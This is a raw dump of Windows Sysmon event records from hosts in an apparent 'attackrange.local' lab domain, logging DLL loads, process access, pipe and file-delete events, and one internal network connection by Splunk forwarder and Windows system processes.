CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531282Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531281Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net 
Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531280Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001531279Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531278Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531277Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531276Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531275Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531274Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531273Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531272Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531271Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531270Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531269Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® 
Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531268Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531267Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001531266Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531265Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base 
APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001531264Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531263Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531262Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531261Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531260Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531259Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531258Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 
734700x80000000000000001531257Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531256Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531255Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531254Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531253Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001531252Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531251Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531250Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531249Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531248Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x80000000000000001531247Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531246Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-842A-607D-9700-00000000BB01}37163760C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531245Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.008{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531244Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 
17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531243Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531242Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531241Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531240Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531239Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x80000000000000001094901Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:27.611{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F89F2674C1735425613A366B67B94EF0,SHA256=C73FE626755AAC394B7AC09F33E92F3D2035490F205D7D8DD50D72D8CC11BF65,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001605603Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:25.671{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49719-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001605602Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.142{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605601Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.142{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98E4D629711A9E541EDC5F45BB97E696,SHA256=A71B1C2CAA326D726A704D105ECAC345D2DBBEADDB7AAECA4CDBF7BD3E733A40falsefalse - insufficient disk space 11241100x80000000000000001605600Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.141{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605599Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.141{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56F5CA7F3260ADD61E3FF31809F7B355,SHA256=F1D21BE6F600BC58D4B0B73E3CF89F61ACAFAB337B7027E13BDB791D27959F12falsefalse - insufficient disk space 
11241100x80000000000000001605598Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.140{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605597Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.140{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17050F72BB95C9A107C4E986C8903494,SHA256=617F281DD83EFD277B3FBCE14301A097B2D0FBC4F61DEFD81A6153C0FD27992Afalsefalse - insufficient disk space 10341000x80000000000000001094900Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:27.468{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094899Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
